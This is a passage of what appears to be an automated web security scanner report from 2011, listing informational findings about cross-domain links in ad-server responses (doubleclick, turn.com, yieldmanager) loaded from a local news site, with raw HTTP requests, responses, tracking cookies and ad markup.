Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:29:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 243

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/k;44306;0-0;0;29116611;896-300/75;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.99. http://ad.doubleclick.net/adj/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/wn.loc.wcax/news;sz=300x75;wnsz=44;tile=2;wncc=News;wnpt=C;wnpc=category;wncp=WCAX;wncid=18197;=undefined;=undefined;wnad85=wcax;wnad44=wcax;apptype=platform;env=production;ord=19818295? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:34:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 243

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/n;44306;0-0;0;29112185;896-300/75;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.100. http://ad.doubleclick.net/adj/wn.loc.wcax/political  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.wcax/political

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/wn.loc.wcax/political;sz=300x75;wnsz=44;tile=2;wncc=Political;wnpt=S;wnpc=story;wncp=WCAX;wncid=503137;wnad85=wcax;wnad44=wcax;apptype=platform;env=production;ord=7900158? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:35:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 243

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/f;44306;0-0;0;29116625;896-300/75;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.101. http://ad.doubleclick.net/adj/wn.loc.wcax/promotion1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.wcax/promotion1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/wn.loc.wcax/promotion1;sz=300x75;wnsz=44;tile=2;wncc=Promotion%201;wnpt=S;wnpc=story;wncp=WCAX;wncid=452989;wnad85=wcax;wnad44=wcax;apptype=platform;env=production;ord=87321408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=452989
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 13:16:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 243

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/q;44306;0-0;0;29116632;896-300/75;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.102. http://ad.doubleclick.net/adj/wn.loc.wcax/sales-lifestyle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.wcax/sales-lifestyle

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/wn.loc.wcax/sales-lifestyle;sz=300x75;wnsz=44;tile=2;wncc=Sales%20-%20Lifestyle;wnpt=C;wnpc=category;wncp=WCAX;wncid=68446;wnad85=wcax;wnad44=wcax;apptype=platform;env=production;ord=81412589? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:34:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 243

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/p;44306;0-0;0;29117532;896-300/75;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.103. http://ad.doubleclick.net/adj/wn.loc.wcax/sales-travel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.wcax/sales-travel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/wn.loc.wcax/sales-travel;sz=300x75;wnsz=44;tile=2;wncc=Sales%20-%20Travel;wnpt=C;wnpc=category;wncp=WCAX;wncid=189321;wnad85=wcax;wnad44=wcax;apptype=platform;env=production;ord=99886549? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=189321
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 13:16:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 243

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/q;44306;0-0;0;29116676;896-300/75;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.104. http://ad.doubleclick.net/adj/wn.loc.wcax/weather  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.wcax/weather

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/wn.loc.wcax/weather;sz=300x75;wnsz=44;tile=2;wncc=Weather;wnpt=C;wnpc=weather;wncp=WCAX;wncid=18196;wnad85=wcax;wnad44=wcax;apptype=platform;env=production;ord=79347955? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:30:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 243

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/b;44306;0-0;0;29112187;896-300/75;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.105. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /server/ads.js?pub=6552261&cch=6553220&code=6554741&l=468x60&aid=25429411&ahcid=595414&bimpd=bvq28451foJSYWMGSWpGLm57PuP1ep3e8pYSpjMgXYBgzZsm_MD3Ph0_AT4tfqL1DmeJqXqoXz4419yIOhU5gOeJMESGQq7G9iOXNAB4-MSg_E-gdQPFfwGO456s277eQI6aJFALXQQZneqbwRBx74CSLEVQbXs-IEXofIReOpq_XD26qi_jA_AuAQLWcK-tlTKPEPwzWzLjcG0petCQ0kOZWgcTS_a_4u4oxn8pOmWjHRY6EBGuSwXwHGMEC0xL3dnura1cEVep9swAHPGcQgMIlGKLUwZcdE7RzNOB1XKprf8mRndDhhFf8Sdys88gdgxCVuolRLb7Z-3WuXH2eelAZ6GtOP-ASuDVvjj6Alva3C8QNQcmEuoh5hLm8UhVLPCQNQ1NJ6FtytBorXofoFtBivKRqgKwft45cpCMCxp949Lefsp8QsMgMdbB8_G407eUqjR_zXj68onFm3lvdZYjcV-mkQxfnW3r5gh2ZcKhGAdZc50HfofVzLGPk2rHHwOWv-gGYK-_EdRAynUJQc9OQ0JCH3IRRC2v9iFYyIGsJ_FzMFXQEDgUfSCtUSLiNCZslCDsmK2JC-xdJmz2cjfYrblFN1Vrq7tHBSJG_h8MbnZNh9bOlTF5VJxTMpf6PQwEcwTA1AnGV4Q2SYTL57oEC7wd4-ropmSQNL3Tn8jt_T370WDWWY1SqEwEJwbhIPZgphozREaBUNGGZK6KHTQH4WG9KeAs_FmnJA3_tygz_AroS6eWPLNVODVq-iRPeSnzq5ViiHXxn7qhO2_sdw&acp=0.027583195495811192 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15069%7C15069%7C15069%7C15069%7Cundefined%7C15069; rv=1; uid=4608069584519221037; pf=cu1FbtXKKpFof-hWjfkQRcVIkA_tbns9D4-b88MB0l6CH-nC-kQ69MLaDP7avFRDzd5xTtrRgn51HC41qoSB9_pqNLucEh96CCAoHJ73Ep-dCbxIubA9vJ0TJiztXY_3cxb2oDS_ZBeMeceweOTTRM5O3f8IMqs1jnadlyIx8Ew

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 11 Apr 2011 12:35:43 GMT
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=tmY-x8L_yowSJFqM0vF4Y8CuY9t_hBSzjQil7z33OlYpagDPKKctVczI9DEFcEkPcxpGHxRlubu1xR21Mxu4g-sHDXOosP1lwOMr_-ta2t973bvsD6p3TnXOe8vTPY4VFaT6eTBuV55JRFz8lx3PqdqozOSXNU0m0cAav4sZMCcTY1vGdjvt8S43nB6dS9OmxjcTGL1eKfAUVOMXIUnylA; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: fc=eFAOz3ilQ4gYIBtFIJGWAE5_UN3y883I71mcX_0aEuuubHizRKm2LPdnMwd17GsW3WQO872ou4xvEVRnVXW81PsHnm-jU8W9DeXq1d2r1JKkV1vPzSwkQiZJzLr4lAFo; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: pf=snK9kHUjEl1FaWKxPCEh1sJ8lErb_iSlHvQid9sfqYGDVsdGVkOFL386xes7a4VRH-w_0yHZxr5U-a1ULJAMKQRyElVn9VAUzXky4Bxf5K8hlcBpkm8Sg5-23YdyuJpz9_hZk2y4Lc1tg0PRNwxT__KovNH6HfPSeeybFLsgN_DN9JRYGQVWUbjEaPiKqkBr8AkkycJ0w6q2tbQDIXhSrAgkLZbHfwITF7RboAby-GXjYWEb1kaerphA9cWJarOLh_BwiBS09OfPB0I41L7nq5FuSGZvCDWT_YGlhDw-_9zGhvu2FiJEpdM7zDK0xqeWNUj9wzAaHETIIAZhDZgOW6C-zFUZM9OcnDkQKyl2S7I; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:35:43 GMT
Content-Length: 10051


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
<!-- BEGIN STANDARD TAG - 468 x 60 - Turn Sprint Q1: Run-of-site - DO NOT MODIFY -->\n<SCRIPT TYPE="text/javascript" SRC="http://ads.bluelithium.com/st?ad_type=ad&ad_size=468x60&section=1689424&pub_redirect_unencoded=1&pub_redirect=http://r.turn.com/r/formclick/id/J81uPvGhVn7WCA8ABgIBAA/url/"></SCRIPT>
...[SNIP]...
<img border="0" src="http://r.turn.com/r/beacon?b2=pjYA2ip2Sqzvk0hSSe8RwZGEpGlwcwjW4MrvO9uJ_WO03_Y86yLq7uu3PPVLuSSspgqtTLdabWgRXwQusEBEYg&cid="> \n                    <img height="1" width="1" style="border-style:none;" alt="" src="http://segments.adap.tv/data/?p=cadreon&type=gif&segment=11&add=true"/> \n                    <img border="0" src="http://r.turn.com/r/beacon?b2=dgreSKR1l3-fFqwVrhKk2fFaNoS5G6K4DRLGa89Io1jPVx7awJtIT5bFbQ7adJJ3pFdSCXahzXLc-TDDfVb0Sw&cid=">
...[SNIP]...
10.106. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /iframe3?1DcIAFDHGQAvoogAAAAAAGK2IgAAAAAAAgAAAAQAAAAAAP8AAAAHCIuDLQAAAAAAAIEtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABE1BAAAAAAAAIAAgAAAAAAgpVDi2xn8z8AAAAAAAASQK0cWmQ73.k.AAAAAAAAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADRnzl3IDfpCeJpp1AiFaPPhSvxg1SnbSzUHg-6AAAAAA==,http%3A%2F%2Fr.turn.com%2Fr%2Fformclick%2Fid%2FJ81uPvGhVn72wQgAAQIBAA%2Furl%2F%24,http%3A%2F%2Fwww.wcax.com%2Fglobal%2Fstory.asp%3Fs%3D503137,Z%3D468x60%26x%3Dhttp%253A%252F%252Fr%252Eturn%252Ecom%252Fr%252Fformclick%252Fid%252FJ81uPvGhVn72wQgAAQIBAA%252Furl%252F%2524%26s%3D1689424%26_salt%3D2792101757%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D503137%26r%3D1,e2f6df20-62a5-11e0-a636-00304862d97c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; ih="b!!!!$!/cM[!!!!#<uB1*!0Qau!!!!#<tePk"; pv1="b!!!!$!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~"; bh="b!!!!r!!-O3!!!!$<uFx5!!/xg!!!!#<uFx5!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!%<uFx5!!j,.!!<NC<td)Q!!vJ=!!!!#<uFx5!!vpb!!!!#<tdei!!xxe!!!!#<tdei!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#0')!!!!#<tdei!#1*j!!!!#<uFx5!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pv!!!!#<u]Bd!#3pw!!!!#<u7R!!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#Km-!!!!#<u7R!!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Z8E!!!!$<uFx5!#Z`$!!!!#<uFx5!#Zea!!!!#<uFx5!#`U,!!!!#<uFx5!#`U/!!!!#<uFx5!#`U4!!!!#<uFx5!#`U9!!!!#<uFx5!#`_p!!!!#<tdei!#aH+!!!!#<u]Bd!#c%+!!!!#<u7R!!#eRM!!!!#<tdei!#fBj!!!!$<uFx5!#fBk!!!!$<uFx5!#fBm!!!!$<uFx5!#fBn!!!!$<uFx5!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#gb%!!!!#<uFx5!#gu2!!!!#<tePk!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!%<uFx5!#uR7!!!!$<uFx5!#uR:!!!!%<uFx5!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#xu[!!!!#<u]Bd!$#r<!!!!#<td)R!$'(]!!!!#<u]Bd"; BX=265jgc96pflsl&b=4&s=b9&t=92

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:35:44 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0044.rm.ac4
Set-Cookie: ih="b!!!!%!/cM[!!!!#<uB1*!0Qau!!!!#<tePk!1UC(!!!!#<u]FZ"; path=/; expires=Mon, 08-Apr-2013 12:35:44 GMT
Set-Cookie: vuday1=j5M]9!>zo]2r<p+; path=/; expires=Sun, 10-Apr-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!%!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~!$%ST!!oR7!$dkU!1UC(!%`n`!!!!$!?5%!$U=A2![(N+!'mla!'me'~~~~~~<u]FZ<v[,tM.jTN"; path=/; expires=Mon, 08-Apr-2013 12:35:44 GMT
Set-Cookie: BX=265jgc96pflsl&b=4&s=b9&t=92; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sat, 09 Apr 2011 12:35:44 GMT
Pragma: no-cache
Content-Length: 921
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8954415);}
</script><iframe src="http://view.atdmt.com/M0N/iview/311034729/direct;wi.468;hi.60/01?time=1302352544&click=http://ads.bluelithium.com/clk?2,13%3Be1d7ef824f993900%3B12f3a42c444,0%3B%3B%3B3472721003,1DcIAFDHGQAvoogAAAAAAGK2IgAAAAAAAgAAAAQAAAAAAP8AAAAHCIuDLQAAAAAAAIEtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABE1BAAAAAAAAIAAgAAAAAARMRCOi8BAAAAAAAAAGUyZjZkZjIwLTYyYTUtMTFlMC1hNjM2LTAwMzA0ODYyZDk3YwBXlSoAAAA=,http%3A%2F%2Fr.turn.com%2Fr%2Fformclick%2Fid%2FJ81uPvGhVn72wQgAAQIBAA%2Furl%2F%24,http%3A%2F%2Fwww.wcax.com%2Fglobal%2Fstory.asp%3Fs%3D503137," frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="468" height="60"></iframe>
...[SNIP]...
10.107. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?wT8nBQNzEgCKRUkAAAAAAAoODwAAAAAAAgAAAAIAAAAAAP8AAAACDMxcHgAAAAAAFCMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAA..9fSPlwxT8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADWnlzTrhPsCRs0MtA00DGMqIYxffa9YHqn-QdSAAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302540075598%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,Z%3D300x250%26s%3D1209091%26_salt%3D4049171621%26B%3D10%26r%3D0,86330604-645a-11e0-bf3c-003048d6d8aa HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302540075598&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; ih="b!!!!%!/cM[!!!!#<uB1*!0Qau!!!!#<tePk!1UC(!!!!#<u]FZ"; pv1="b!!!!%!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~!$%ST!!oR7!$dkU!1UC(!%`n`!!!!$!?5%!$U=A2![(N+!'mla!'me'~~~~~~<u]FZ<v[,tM.jTN"; bh="b!!!#]!!-O3!!!!(<uwBp!!/xg!!!!'<uwBp!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!L_w!!!!%<uwBt!!NqV!!!!%<uwBp!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!)<uwBp!!igy!!!!%<uwBp!!j,.!!<NC<td)Q!!jW8!!!!$<u]Fa!!m>h!!!!%<uwBp!!vJ=!!!!'<uwBp!!vpb!!!!#<tdei!!xxe!!!!#<tdei!!yaE!!!!%<uwBt!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#*.a!!!!#<uw3o!#*VS!!!!#<uw3o!#.dO!!!!%<uwBt!#0')!!!!#<tdei!#1*b!!!!%<uwBp!#1*c!!!!%<uwBp!#1*j!!!!'<uwBp!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pv!!!!#<u]Bd!#3pw!!!!#<u7R!!#5(U!!!!#<uw:l!#5(X!!!!#<uw3o!#5([!!!!#<uw:l!#5(a!!!!#<uw3o!#5(c!!!!#<uw3o!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#M]c!!!!%<uwBt!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Q+/!!!!%<uwBt!#Q+^!!!!%<uwBt!#Q+o!!!!%<uwBt!#Q+p!!!!%<uwBt!#Q,.!!!!%<uwBt!#RY.!!!!%<uwBt!#SCj!!!!%<uwBt!#SCk!!!!%<uwBt!#XA!!!!!%<uwBt!#Z8E!!!!(<uwBp!#Z`$!!!!'<uwBp!#ZbA!!!!%<uwBp!#ZbX!!!!%<uwBp!#Zea!!!!'<uwBp!#ZjC!!!!%<uwBp!#]W%!!!!%<uwBt!#^Bo!!!!%<uwBt!#`U,!!!!'<uwBp!#`U/!!!!'<uwBp!#`U4!!!!'<uwBp!#`U9!!!!'<uwBp!#`_p!!!!#<tdei!#a,x!!!!%<uwBt!#a3k!!!!%<uwBt!#aG>!!!!%<uwBt!#aH+!!!!#<u]Bd!#b<b!!!!#<uw:l!#b<c!!!!#<uw:l!#b<d!!!!#<uw:l!#b<f!!!!#<uw:l!#b<h!!!!#<uw3o!#b<j!!!!#<uw3o!#b='!!!!#<uw:l!#b=H!!!!#<uw3o!#b=I!!!!#<uw:l!#eRM!!!!#<tdei!#eU%!!!!%<uwBt!#eaO!!!!%<uwBt!#f8c!!!!%<uwBt!#fBj!!!!(<uwBp!#fBk!!!!(